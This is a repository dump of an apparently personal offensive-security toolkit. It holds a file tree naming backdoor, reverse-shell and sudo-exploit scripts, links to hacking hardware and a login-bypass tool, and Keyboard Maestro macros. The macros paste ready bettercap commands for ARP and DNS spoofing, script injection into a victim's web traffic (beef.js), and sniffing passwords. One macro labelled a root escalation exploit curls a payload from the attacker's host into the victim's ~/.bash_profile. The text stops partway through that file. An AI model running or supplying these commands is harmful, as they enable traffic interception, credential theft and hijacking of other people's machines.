├── README.md ├── ressources ├── attacks.md ├── hardware.md └── macros │ ├── Bettercap Macros.kmmacros │ ├── Computer Macros.kmmacros │ ├── Exploitation Macros.kmmacros │ ├── Information gathering Macros.kmmacros │ ├── Metasploit Macros.kmmacros │ ├── Post exploitation Macros.kmmacros │ ├── README.md │ └── Remote terminal Macros.kmmacros ├── system └── exploitation │ ├── backdoor.sh │ ├── host_DNS_enum.sh │ ├── payloads │ ├── bash.md │ ├── python.md │ ├── ruby.md │ └── tclsh.md │ ├── reverse_shells.md │ ├── reverse_tcp.py │ └── sudo.sh ├── tools ├── brute_force │ └── wpscan.md ├── john.md ├── metasploit.md ├── mitm │ ├── ARP Spoofing & Bettercap.md │ ├── ARP Spoofing & MITM Proxy.md │ ├── ARP Spoofing & MITM.md │ └── DNS Spoofing & MITM.md ├── msfvenom.md ├── network_scan │ ├── netdiscover.md │ └── openvas.md ├── python.md ├── tcpdump.md ├── web │ └── web_vulnerabilities.md ├── wireshark.md └── wordlists │ ├── cewl.md │ ├── cupp.md │ └── wordlists.md └── wifi ├── crack.md ├── fake_ap.md ├── frameworks.md ├── phishing.md └── sniffing.md /ressources/attacks.md: -------------------------------------------------------------------------------- 1 | Capture Wi-Fi in Wireshark: 2 | https://miloserdov.org/?p=2525 3 | 4 | https://www.kalitut.com/2019/04/decrypt-wi-fi-traffic-wireshark.html 5 | 6 | Bettercap http alone: 7 | https://www.cyberpunk.rs/bettercap-usage-examples-overview-custom-setup-caplets 8 | 9 | https://net-security.fr/security/prise-en-main-de-bettercap-sur-kali-linux/ 10 | 11 | Check !!! USB-Rubber-Ducky 12 | https://github.com/hak5darren/USB-Rubber-Ducky 13 | 14 | Virus total: 15 | 16 | Test a virus to find out which antivirus will detect it. (don't send custom virus to virus total because the database is used to integrate new virus in antivirus databases) 17 | https://www.virustotal.com/gui/ 18 | 19 | -------------------------------------------------------------------------------- /ressources/hardware.md: -------------------------------------------------------------------------------- 1 | USB: 2 | https://shop.hak5.org/ 3 | 4 | Authentification evasion: 5 | Boot from usb and the system don't need credentials to connect on Windows and MacOS. 6 | 7 | https://www.piotrbania.com/all/kon-boot/fr -------------------------------------------------------------------------------- /ressources/macros/Bettercap Macros.kmmacros: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Activate 7 | Normal 8 | CreationDate 9 | 604439241.08792102 10 | CustomIconData 11 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 12 | Macros 13 | 14 | 15 | Actions 16 | 17 | 18 | Buttons 19 | 20 | 21 | Button 22 | OK 23 | 24 | 25 | Button 26 | Cancel 27 | Cancel 28 | 29 | 30 | 31 | MacroActionType 32 | PromptForUserInput 33 | Prompt 34 | Please enter the information needed (domain and rhost are optional): 35 | TimeOutAbortsMacro 36 | 37 | Title 38 | Scan network 39 | Variables 40 | 41 | 42 | Default 43 | %Variable%Gateway% 44 | Variable 45 | Gateway 46 | 47 | 48 | Default 49 | %Variable%Interface% 50 | Variable 51 | interface 52 | 53 | 54 | 55 | 56 | Action 57 | ByPasting 58 | MacroActionType 59 | InsertText 60 | Text 61 | sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'net.recon on;net.probe on;clear;ticker on;' 62 | 63 | 64 | IsDisclosed 65 | 66 | KeyCode 67 | 36 68 | MacroActionType 69 | SimulateKeystroke 70 | Modifiers 71 | 0 72 | ReleaseAll 73 | 74 | TargetApplication 75 | 76 | TargetingType 77 | Front 78 | 79 | 80 | CreationDate 81 | 604447378.603374 82 | CustomIconData 83 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 84 | ModificationDate 85 | 610919145.01962996 86 | Name 87 | Scan network (bettercap) 88 | Triggers 89 | 90 | 91 | MacroTriggerType 92 | StatusMenu 93 | 94 | 95 | UID 96 | C7A8BAFF-E384-45F6-AFC7-EE8E991C840F 97 | 98 | 99 | Name 100 | Bettercap 101 | Targeting 102 | 103 | Targeting 104 | Included 105 | TargetingApps 106 | 107 | 108 | BundleIdentifier 109 | com.apple.Terminal 110 | Name 111 | Terminal 112 | NewFile 113 | /System/Applications/Utilities/Terminal.app 114 | 115 | 116 | BundleIdentifier 117 | com.googlecode.iterm2 118 | Name 119 | iTerm 120 | NewFile 121 | /Applications/iTerm.app 122 | 123 | 124 | 125 | ToggleMacroUID 126 | 0E4EEE6F-037D-40A3-98D0-6FCF76CA6505 127 | UID 128 | 8849B08E-11E5-4AF9-BBF0-327D0490E714 129 | 130 | 131 | Activate 132 | Normal 133 | CreationDate 134 | 604439241.08792102 135 | CustomIconData 136 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 137 | Macros 138 | 139 | 140 | Actions 141 | 142 | 143 | Buttons 144 | 145 | 146 | Button 147 | OK 148 | 149 | 150 | Button 151 | Cancel 152 | Cancel 153 | 154 | 155 | 156 | MacroActionType 157 | PromptForUserInput 158 | Prompt 159 | Please enter the local gateway and interface: 160 | TimeOutAbortsMacro 161 | 162 | Title 163 | Open bettercap 164 | Variables 165 | 166 | 167 | Default 168 | %Variable%Gateway% 169 | Variable 170 | Gateway 171 | 172 | 173 | Default 174 | %Variable%Interface% 175 | Variable 176 | Interface 177 | 178 | 179 | 180 | 181 | Action 182 | ByPasting 183 | MacroActionType 184 | InsertText 185 | Text 186 | sudo bettercap -caplet http-ui -gateway-override %Variable%Gateway% -iface %Variable%Interface% 187 | 188 | 189 | IsDisclosed 190 | 191 | KeyCode 192 | 36 193 | MacroActionType 194 | SimulateKeystroke 195 | Modifiers 196 | 0 197 | ReleaseAll 198 | 199 | TargetApplication 200 | 201 | TargetingType 202 | Front 203 | 204 | 205 | CreationDate 206 | 603158737.91990697 207 | CustomIconData 208 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 209 | ModificationDate 210 | 604465850.83681703 211 | Name 212 | Open bettercap (web view) 213 | Triggers 214 | 215 | 216 | MacroTriggerType 217 | StatusMenu 218 | 219 | 220 | UID 221 | B466BFAC-2F85-4ED7-BB1E-C14C1D73D1A4 222 | 223 | 224 | Name 225 | Bettercap 226 | Targeting 227 | 228 | Targeting 229 | Included 230 | TargetingApps 231 | 232 | 233 | BundleIdentifier 234 | com.apple.Terminal 235 | Name 236 | Terminal 237 | NewFile 238 | /System/Applications/Utilities/Terminal.app 239 | 240 | 241 | BundleIdentifier 242 | com.googlecode.iterm2 243 | Name 244 | iTerm 245 | NewFile 246 | /Applications/iTerm.app 247 | 248 | 249 | 250 | ToggleMacroUID 251 | 0E4EEE6F-037D-40A3-98D0-6FCF76CA6505 252 | UID 253 | 8849B08E-11E5-4AF9-BBF0-327D0490E714 254 | 255 | 256 | Activate 257 | Normal 258 | CreationDate 259 | 604439241.08792102 260 | CustomIconData 261 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 262 | Macros 263 | 264 | 265 | Actions 266 | 267 | 268 | Buttons 269 | 270 | 271 | Button 272 | OK 273 | 274 | 275 | Button 276 | Cancel 277 | Cancel 278 | 279 | 280 | 281 | MacroActionType 282 | PromptForUserInput 283 | Prompt 284 | Please enter the local gateway and interface: 285 | TimeOutAbortsMacro 286 | 287 | Title 288 | Open bettercap 289 | Variables 290 | 291 | 292 | Default 293 | %Variable%Gateway% 294 | Variable 295 | Gateway 296 | 297 | 298 | Default 299 | %Variable%Interface% 300 | Variable 301 | Interface 302 | 303 | 304 | 305 | 306 | Action 307 | ByPasting 308 | MacroActionType 309 | InsertText 310 | Text 311 | sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% 312 | 313 | 314 | IsDisclosed 315 | 316 | KeyCode 317 | 36 318 | MacroActionType 319 | SimulateKeystroke 320 | Modifiers 321 | 0 322 | ReleaseAll 323 | 324 | TargetApplication 325 | 326 | TargetingType 327 | Front 328 | 329 | 330 | CreationDate 331 | 603158737.91990697 332 | CustomIconData 333 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 334 | ModificationDate 335 | 604460217.17678595 336 | Name 337 | Open bettercap 338 | Triggers 339 | 340 | 341 | MacroTriggerType 342 | StatusMenu 343 | 344 | 345 | UID 346 | 0A677BCF-70A5-45EF-A5E9-FF26D38E3E22 347 | 348 | 349 | Name 350 | Bettercap 351 | Targeting 352 | 353 | Targeting 354 | Included 355 | TargetingApps 356 | 357 | 358 | BundleIdentifier 359 | com.apple.Terminal 360 | Name 361 | Terminal 362 | NewFile 363 | /System/Applications/Utilities/Terminal.app 364 | 365 | 366 | BundleIdentifier 367 | com.googlecode.iterm2 368 | Name 369 | iTerm 370 | NewFile 371 | /Applications/iTerm.app 372 | 373 | 374 | 375 | ToggleMacroUID 376 | 0E4EEE6F-037D-40A3-98D0-6FCF76CA6505 377 | UID 378 | 8849B08E-11E5-4AF9-BBF0-327D0490E714 379 | 380 | 381 | Activate 382 | Normal 383 | CreationDate 384 | 604439241.08792102 385 | CustomIconData 386 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 387 | Macros 388 | 389 | 390 | Actions 391 | 392 | 393 | Buttons 394 | 395 | 396 | Button 397 | OK 398 | 399 | 400 | Button 401 | Cancel 402 | Cancel 403 | 404 | 405 | 406 | MacroActionType 407 | PromptForUserInput 408 | Prompt 409 | Please enter the information needed (domain and rhost are optional): 410 | TimeOutAbortsMacro 411 | 412 | Title 413 | HTTP Script injection 414 | Variables 415 | 416 | 417 | Default 418 | %Variable%Gateway% 419 | Variable 420 | Gateway 421 | 422 | 423 | Default 424 | %Variable%RHOST% 425 | Variable 426 | RHOST 427 | 428 | 429 | Default 430 | %Variable%Domain% 431 | Variable 432 | Domain 433 | 434 | 435 | Default 436 | beef.js|invert.js|redirect.js|replace.js|web-override.js 437 | Variable 438 | Script 439 | 440 | 441 | Default 442 | %Variable%Interface% 443 | Variable 444 | interface 445 | 446 | 447 | 448 | 449 | Conditions 450 | 451 | ConditionList 452 | 453 | 454 | ConditionType 455 | Variable 456 | Variable 457 | RHOST 458 | VariableConditionType 459 | IsEmpty 460 | VariableValue 461 | value 462 | 463 | 464 | ConditionListMatch 465 | All 466 | 467 | ElseActions 468 | 469 | 470 | Conditions 471 | 472 | ConditionList 473 | 474 | 475 | ConditionType 476 | Variable 477 | Variable 478 | Domain 479 | VariableConditionType 480 | IsEmpty 481 | VariableValue 482 | value 483 | 484 | 485 | ConditionListMatch 486 | All 487 | 488 | ElseActions 489 | 490 | 491 | Action 492 | ByPasting 493 | MacroActionType 494 | InsertText 495 | Text 496 | sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'set arp.spoof.fullduplex true;set arp.spoof.targets %Variable%RHOST%;arp.spoof on;set http.proxy.script /Library/WebServer/Documents/bettercap/%Variable%Script%;set http.proxy.blacklist *;set http.proxy.whitelist %Variable%Domain%;http.proxy on' 497 | 498 | 499 | MacroActionType 500 | IfThenElse 501 | ThenActions 502 | 503 | 504 | Action 505 | ByPasting 506 | MacroActionType 507 | InsertText 508 | Text 509 | sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'set arp.spoof.fullduplex true;set arp.spoof.targets %Variable%RHOST%;arp.spoof on;set http.proxy.script /Library/WebServer/Documents/bettercap/%Variable%Script%;http.proxy on' 510 | 511 | 512 | TimeOutAbortsMacro 513 | 514 | 515 | 516 | MacroActionType 517 | IfThenElse 518 | ThenActions 519 | 520 | 521 | Conditions 522 | 523 | ConditionList 524 | 525 | 526 | ConditionType 527 | Variable 528 | Variable 529 | Domain 530 | VariableConditionType 531 | IsEmpty 532 | VariableValue 533 | value 534 | 535 | 536 | ConditionListMatch 537 | All 538 | 539 | ElseActions 540 | 541 | 542 | Action 543 | ByPasting 544 | MacroActionType 545 | InsertText 546 | Text 547 | sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'set arp.spoof.fullduplex true;arp.spoof on;set http.proxy.script /Library/WebServer/Documents/bettercap/%Variable%Script%;set http.proxy.blacklist *;set http.proxy.whitelist %Variable%Domain%;http.proxy on' 548 | 549 | 550 | MacroActionType 551 | IfThenElse 552 | ThenActions 553 | 554 | 555 | Action 556 | ByPasting 557 | MacroActionType 558 | InsertText 559 | Text 560 | sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'set arp.spoof.fullduplex true;arp.spoof on;set http.proxy.script /Library/WebServer/Documents/bettercap/%Variable%Script%;http.proxy on' 561 | 562 | 563 | TimeOutAbortsMacro 564 | 565 | 566 | 567 | TimeOutAbortsMacro 568 | 569 | 570 | 571 | IsDisclosed 572 | 573 | KeyCode 574 | 36 575 | MacroActionType 576 | SimulateKeystroke 577 | Modifiers 578 | 0 579 | ReleaseAll 580 | 581 | TargetApplication 582 | 583 | TargetingType 584 | Front 585 | 586 | 587 | CreationDate 588 | 604447378.603374 589 | CustomIconData 590 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 591 | ModificationDate 592 | 604477603.24702001 593 | Name 594 | HTTP Script injection (bettercap) 595 | Triggers 596 | 597 | 598 | MacroTriggerType 599 | StatusMenu 600 | 601 | 602 | UID 603 | 4ECBA013-A056-4A24-9FA6-7AA3F8075DDD 604 | 605 | 606 | Name 607 | Bettercap 608 | Targeting 609 | 610 | Targeting 611 | Included 612 | TargetingApps 613 | 614 | 615 | BundleIdentifier 616 | com.apple.Terminal 617 | Name 618 | Terminal 619 | NewFile 620 | /System/Applications/Utilities/Terminal.app 621 | 622 | 623 | BundleIdentifier 624 | com.googlecode.iterm2 625 | Name 626 | iTerm 627 | NewFile 628 | /Applications/iTerm.app 629 | 630 | 631 | 632 | ToggleMacroUID 633 | 0E4EEE6F-037D-40A3-98D0-6FCF76CA6505 634 | UID 635 | 8849B08E-11E5-4AF9-BBF0-327D0490E714 636 | 637 | 638 | Activate 639 | Normal 640 | CreationDate 641 | 604439241.08792102 642 | CustomIconData 643 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 644 | Macros 645 | 646 | 647 | Actions 648 | 649 | 650 | Buttons 651 | 652 | 653 | Button 654 | OK 655 | 656 | 657 | Button 658 | Cancel 659 | Cancel 660 | 661 | 662 | 663 | MacroActionType 664 | PromptForUserInput 665 | Prompt 666 | Please enter the information needed (rhost is optional): 667 | TimeOutAbortsMacro 668 | 669 | Title 670 | DNS spoofing 671 | Variables 672 | 673 | 674 | Default 675 | %Variable%Gateway% 676 | Variable 677 | Gateway 678 | 679 | 680 | Default 681 | %Variable%RHOST% 682 | Variable 683 | RHOST 684 | 685 | 686 | Default 687 | %Variable%LHOST% 688 | Variable 689 | LHOST 690 | 691 | 692 | Default 693 | %Variable%Interface% 694 | Variable 695 | interface 696 | 697 | 698 | Default 699 | %Variable%Domain% 700 | Variable 701 | Domain 702 | 703 | 704 | 705 | 706 | Conditions 707 | 708 | ConditionList 709 | 710 | 711 | ConditionType 712 | Variable 713 | Variable 714 | RHOST 715 | VariableConditionType 716 | IsEmpty 717 | VariableValue 718 | value 719 | 720 | 721 | ConditionListMatch 722 | All 723 | 724 | ElseActions 725 | 726 | 727 | Action 728 | ByPasting 729 | MacroActionType 730 | InsertText 731 | Text 732 | sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'set arp.spoof.fullduplex true;set arp.spoof.targets %Variable%RHOST%;arp.spoof on;set dns.spoof.domains %Variable%Domain%;set dns.spoof.address %Variable%LHOST%;dns.spoof on;set http.server.path /Library/WebServer/Documents;http.server on' 733 | 734 | 735 | MacroActionType 736 | IfThenElse 737 | ThenActions 738 | 739 | 740 | Action 741 | ByPasting 742 | MacroActionType 743 | InsertText 744 | Text 745 | sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'set arp.spoof.fullduplex true;arp.spoof on;set dns.spoof.domains %Variable%Domain%;set dns.spoof.all true;dns.spoof on;set http.server.path /Library/WebServer/Documents;http.server on' 746 | 747 | 748 | TimeOutAbortsMacro 749 | 750 | 751 | 752 | IsDisclosed 753 | 754 | KeyCode 755 | 36 756 | MacroActionType 757 | SimulateKeystroke 758 | Modifiers 759 | 0 760 | ReleaseAll 761 | 762 | TargetApplication 763 | 764 | TargetingType 765 | Front 766 | 767 | 768 | CreationDate 769 | 604447378.603374 770 | CustomIconData 771 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 772 | ModificationDate 773 | 604471840.16793704 774 | Name 775 | DNS spoofing (bettercap) 776 | Triggers 777 | 778 | 779 | MacroTriggerType 780 | StatusMenu 781 | 782 | 783 | UID 784 | 201B3F76-A89D-44E9-B003-47798139B4F8 785 | 786 | 787 | Name 788 | Bettercap 789 | Targeting 790 | 791 | Targeting 792 | Included 793 | TargetingApps 794 | 795 | 796 | BundleIdentifier 797 | com.apple.Terminal 798 | Name 799 | Terminal 800 | NewFile 801 | /System/Applications/Utilities/Terminal.app 802 | 803 | 804 | BundleIdentifier 805 | com.googlecode.iterm2 806 | Name 807 | iTerm 808 | NewFile 809 | /Applications/iTerm.app 810 | 811 | 812 | 813 | ToggleMacroUID 814 | 0E4EEE6F-037D-40A3-98D0-6FCF76CA6505 815 | UID 816 | 8849B08E-11E5-4AF9-BBF0-327D0490E714 817 | 818 | 819 | Activate 820 | Normal 821 | CreationDate 822 | 604439241.08792102 823 | CustomIconData 824 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 825 | Macros 826 | 827 | 828 | Actions 829 | 830 | 831 | Buttons 832 | 833 | 834 | Button 835 | OK 836 | 837 | 838 | Button 839 | Cancel 840 | Cancel 841 | 842 | 843 | 844 | MacroActionType 845 | PromptForUserInput 846 | Prompt 847 | Please enter the information needed (domain and rhost are optional): 848 | TimeOutAbortsMacro 849 | 850 | Title 851 | Script injection 852 | Variables 853 | 854 | 855 | Default 856 | %Variable%Gateway% 857 | Variable 858 | Gateway 859 | 860 | 861 | Default 862 | %Variable%RHOST% 863 | Variable 864 | RHOST 865 | 866 | 867 | Default 868 | %Variable%Interface% 869 | Variable 870 | interface 871 | 872 | 873 | 874 | 875 | Conditions 876 | 877 | ConditionList 878 | 879 | 880 | ConditionType 881 | Variable 882 | Variable 883 | RHOST 884 | VariableConditionType 885 | IsEmpty 886 | VariableValue 887 | value 888 | 889 | 890 | ConditionListMatch 891 | All 892 | 893 | ElseActions 894 | 895 | 896 | Action 897 | ByPasting 898 | MacroActionType 899 | InsertText 900 | Text 901 | sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'set arp.spoof.fullduplex true;set arp.spoof.targets %Variable%RHOST%;arp.spoof on;' 902 | 903 | 904 | MacroActionType 905 | IfThenElse 906 | ThenActions 907 | 908 | 909 | Action 910 | ByPasting 911 | MacroActionType 912 | InsertText 913 | Text 914 | sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'set arp.spoof.fullduplex true;arp.spoof on;' 915 | 916 | 917 | TimeOutAbortsMacro 918 | 919 | 920 | 921 | IsDisclosed 922 | 923 | KeyCode 924 | 36 925 | MacroActionType 926 | SimulateKeystroke 927 | Modifiers 928 | 0 929 | ReleaseAll 930 | 931 | TargetApplication 932 | 933 | TargetingType 934 | Front 935 | 936 | 937 | CreationDate 938 | 604447378.603374 939 | CustomIconData 940 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 941 | ModificationDate 942 | 604463902.08318996 943 | Name 944 | ARP spoofing (bettercap) 945 | Triggers 946 | 947 | 948 | MacroTriggerType 949 | StatusMenu 950 | 951 | 952 | UID 953 | A3CB8955-8A79-4019-8F21-1CBCE987FD29 954 | 955 | 956 | Name 957 | Bettercap 958 | Targeting 959 | 960 | Targeting 961 | Included 962 | TargetingApps 963 | 964 | 965 | BundleIdentifier 966 | com.apple.Terminal 967 | Name 968 | Terminal 969 | NewFile 970 | /System/Applications/Utilities/Terminal.app 971 | 972 | 973 | BundleIdentifier 974 | com.googlecode.iterm2 975 | Name 976 | iTerm 977 | NewFile 978 | /Applications/iTerm.app 979 | 980 | 981 | 982 | ToggleMacroUID 983 | 0E4EEE6F-037D-40A3-98D0-6FCF76CA6505 984 | UID 985 | 8849B08E-11E5-4AF9-BBF0-327D0490E714 986 | 987 | 988 | Activate 989 | Normal 990 | CreationDate 991 | 604439241.08792102 992 | CustomIconData 993 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 994 | Macros 995 | 996 | 997 | Actions 998 | 999 | 1000 | Buttons 1001 | 1002 | 1003 | Button 1004 | OK 1005 | 1006 | 1007 | Button 1008 | Cancel 1009 | Cancel 1010 | 1011 | 1012 | 1013 | MacroActionType 1014 | PromptForUserInput 1015 | Prompt 1016 | Please enter a regular expression: 1017 | TimeOutAbortsMacro 1018 | 1019 | Title 1020 | Active sniffing 1021 | Variables 1022 | 1023 | 1024 | Default 1025 | .*password=.+ 1026 | Variable 1027 | RegEx 1028 | 1029 | 1030 | 1031 | 1032 | Action 1033 | ByPasting 1034 | MacroActionType 1035 | InsertText 1036 | Text 1037 | set net.sniff.regexp %Variable%RegEx%; 1038 | set net.sniff.output passwords.pcap; 1039 | net.sniff on; 1040 | 1041 | 1042 | IsDisclosed 1043 | 1044 | KeyCode 1045 | 36 1046 | MacroActionType 1047 | SimulateKeystroke 1048 | Modifiers 1049 | 0 1050 | ReleaseAll 1051 | 1052 | TargetApplication 1053 | 1054 | TargetingType 1055 | Front 1056 | 1057 | 1058 | CreationDate 1059 | 603158737.91990697 1060 | CustomIconData 1061 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 1062 | ModificationDate 1063 | 604515003.09291196 1064 | Name 1065 | Active sniffing (bettercap interactive) 1066 | Triggers 1067 | 1068 | 1069 | MacroTriggerType 1070 | StatusMenu 1071 | 1072 | 1073 | UID 1074 | 92C0BD54-A52C-4951-AD34-0D2921D30CDA 1075 | 1076 | 1077 | Name 1078 | Bettercap 1079 | Targeting 1080 | 1081 | Targeting 1082 | Included 1083 | TargetingApps 1084 | 1085 | 1086 | BundleIdentifier 1087 | com.apple.Terminal 1088 | Name 1089 | Terminal 1090 | NewFile 1091 | /System/Applications/Utilities/Terminal.app 1092 | 1093 | 1094 | BundleIdentifier 1095 | com.googlecode.iterm2 1096 | Name 1097 | iTerm 1098 | NewFile 1099 | /Applications/iTerm.app 1100 | 1101 | 1102 | 1103 | ToggleMacroUID 1104 | 0E4EEE6F-037D-40A3-98D0-6FCF76CA6505 1105 | UID 1106 | 8849B08E-11E5-4AF9-BBF0-327D0490E714 1107 | 1108 | 1109 | 1110 | -------------------------------------------------------------------------------- /ressources/macros/Computer Macros.kmmacros: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Activate 7 | Normal 8 | CreationDate 9 | 603124606.59798503 10 | CustomIconData 11 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 12 | Macros 13 | 14 | 15 | Actions 16 | 17 | 18 | Buttons 19 | 20 | 21 | Button 22 | OK 23 | 24 | 25 | Button 26 | Cancel 27 | Cancel 28 | 29 | 30 | 31 | MacroActionType 32 | PromptForUserInput 33 | Prompt 34 | Please enter your root password: 35 | TimeOutAbortsMacro 36 | 37 | Title 38 | Password 39 | Variables 40 | 41 | 42 | Default 43 | 44 | Variable 45 | password 46 | 47 | 48 | 49 | 50 | DisplayKind 51 | Briefly 52 | HonourFailureSettings 53 | 54 | IncludeStdErr 55 | 56 | MacroActionType 57 | ExecuteShellScript 58 | Path 59 | 60 | Source 61 | Variable 62 | SourceVariable 63 | password 64 | Text 65 | sudo -S $KMVAR_password apachectl stop 66 | TimeOutAbortsMacro 67 | 68 | TrimResults 69 | 70 | TrimResultsNew 71 | 72 | UseText 73 | 74 | 75 | 76 | CreationDate 77 | 603131715.94899499 78 | CustomIconData 79 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 80 | ModificationDate 81 | 603138475.32250798 82 | Name 83 | Stop apache 84 | Triggers 85 | 86 | 87 | MacroTriggerType 88 | StatusMenu 89 | 90 | 91 | UID 92 | E0136610-DB66-479F-B741-0E6C0D5E85A1 93 | 94 | 95 | Name 96 | Computer 97 | ToggleMacroUID 98 | 8C88CB68-EC28-4087-B557-8E43F803DB08 99 | UID 100 | 9E7318FE-5CDD-4F52-894A-D6CC604A18D4 101 | 102 | 103 | Activate 104 | Normal 105 | CreationDate 106 | 603124606.59798503 107 | CustomIconData 108 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 109 | Macros 110 | 111 | 112 | Actions 113 | 114 | 115 | Buttons 116 | 117 | 118 | Button 119 | OK 120 | 121 | 122 | Button 123 | Cancel 124 | Cancel 125 | 126 | 127 | 128 | IsDisclosed 129 | 130 | MacroActionType 131 | PromptForUserInput 132 | Prompt 133 | Please enter your root password: 134 | TimeOutAbortsMacro 135 | 136 | Title 137 | Password 138 | Variables 139 | 140 | 141 | Default 142 | 143 | Variable 144 | password 145 | 146 | 147 | 148 | 149 | DisplayKind 150 | Briefly 151 | HonourFailureSettings 152 | 153 | IncludeStdErr 154 | 155 | MacroActionType 156 | ExecuteShellScript 157 | Path 158 | 159 | Source 160 | Variable 161 | SourceVariable 162 | password 163 | Text 164 | sudo -S $KMVAR_password apachectl start 165 | TimeOutAbortsMacro 166 | 167 | TrimResults 168 | 169 | TrimResultsNew 170 | 171 | UseText 172 | 173 | 174 | 175 | CreationDate 176 | 603129950.14537895 177 | CustomIconData 178 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 179 | ModificationDate 180 | 603138466.58408499 181 | Name 182 | Start apache 183 | Triggers 184 | 185 | 186 | MacroTriggerType 187 | StatusMenu 188 | 189 | 190 | UID 191 | 2335E582-B066-44BC-996C-C1DB12B01839 192 | 193 | 194 | Name 195 | Computer 196 | ToggleMacroUID 197 | 8C88CB68-EC28-4087-B557-8E43F803DB08 198 | UID 199 | 9E7318FE-5CDD-4F52-894A-D6CC604A18D4 200 | 201 | 202 | Activate 203 | Normal 204 | CreationDate 205 | 603124606.59798503 206 | CustomIconData 207 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 208 | Macros 209 | 210 | 211 | Actions 212 | 213 | 214 | Buttons 215 | 216 | 217 | Button 218 | OK 219 | 220 | 221 | Button 222 | Cancel 223 | Cancel 224 | 225 | 226 | 227 | MacroActionType 228 | PromptForUserInput 229 | Prompt 230 | Please enter your local IP and victim password 231 | TimeOutAbortsMacro 232 | 233 | Title 234 | Information 235 | Variables 236 | 237 | 238 | Default 239 | %Variable%RHOST% 240 | Variable 241 | RHOST 242 | 243 | 244 | Default 245 | %Variable%USER% 246 | Variable 247 | USER 248 | 249 | 250 | 251 | 252 | Action 253 | ByPasting 254 | MacroActionType 255 | InsertText 256 | Text 257 | ssh %Variable%USER%@%Variable%RHOST% 258 | 259 | 260 | IsDisclosed 261 | 262 | KeyCode 263 | 36 264 | MacroActionType 265 | SimulateKeystroke 266 | Modifiers 267 | 0 268 | ReleaseAll 269 | 270 | TargetApplication 271 | 272 | TargetingType 273 | Front 274 | 275 | 276 | CreationDate 277 | 603162843.93542898 278 | CustomIconData 279 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 280 | ModificationDate 281 | 603480157.49153996 282 | Name 283 | SSH Connection 284 | Triggers 285 | 286 | 287 | MacroTriggerType 288 | StatusMenu 289 | 290 | 291 | UID 292 | DEEF106B-13B2-4F15-A7F3-81609ED48510 293 | 294 | 295 | Name 296 | Computer 297 | ToggleMacroUID 298 | 8C88CB68-EC28-4087-B557-8E43F803DB08 299 | UID 300 | 9E7318FE-5CDD-4F52-894A-D6CC604A18D4 301 | 302 | 303 | Activate 304 | Normal 305 | CreationDate 306 | 603124606.59798503 307 | CustomIconData 308 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 309 | Macros 310 | 311 | 312 | Actions 313 | 314 | 315 | IsDefaultApplication 316 | 317 | MacroActionType 318 | Open1File 319 | Path 320 | /Library/WebServer/Documents 321 | 322 | 323 | CreationDate 324 | 603138237.25083697 325 | CustomIconData 326 | KMEP-GenericFolder 327 | ModificationDate 328 | 604438326.31045103 329 | Name 330 | Open apache folder 331 | Triggers 332 | 333 | 334 | MacroTriggerType 335 | StatusMenu 336 | 337 | 338 | UID 339 | D6CCC2F6-62F9-4A9C-8DB9-FBE734C0EE90 340 | 341 | 342 | Name 343 | Computer 344 | ToggleMacroUID 345 | 8C88CB68-EC28-4087-B557-8E43F803DB08 346 | UID 347 | 9E7318FE-5CDD-4F52-894A-D6CC604A18D4 348 | 349 | 350 | 351 | -------------------------------------------------------------------------------- /ressources/macros/Exploitation Macros.kmmacros: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Activate 7 | Normal 8 | CreationDate 9 | 603140665.49842894 10 | CustomIconData 11 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 12 | Macros 13 | 14 | 15 | Actions 16 | 17 | 18 | Buttons 19 | 20 | 21 | Button 22 | OK 23 | 24 | 25 | Button 26 | Cancel 27 | Cancel 28 | 29 | 30 | 31 | MacroActionType 32 | PromptForUserInput 33 | Prompt 34 | Please enter your local IP 35 | TimeOutAbortsMacro 36 | 37 | Title 38 | Root escalation sudo exploit 39 | Variables 40 | 41 | 42 | Default 43 | %Variable%LHOST% 44 | Variable 45 | LHOST 46 | 47 | 48 | 49 | 50 | Action 51 | ByPasting 52 | MacroActionType 53 | InsertText 54 | Text 55 | cp ~/.bash_profile ~/.bash_profile.old && curl 'http://%Variable%LHOST%/sudo' >> ~/.bash_profile 56 | 57 | 58 | IsDisclosed 59 | 60 | KeyCode 61 | 36 62 | MacroActionType 63 | SimulateKeystroke 64 | Modifiers 65 | 0 66 | ReleaseAll 67 | 68 | TargetApplication 69 | 70 | TargetingType 71 | Front 72 | 73 | 74 | CreationDate 75 | 603139824.59357095 76 | CustomIconData 77 | 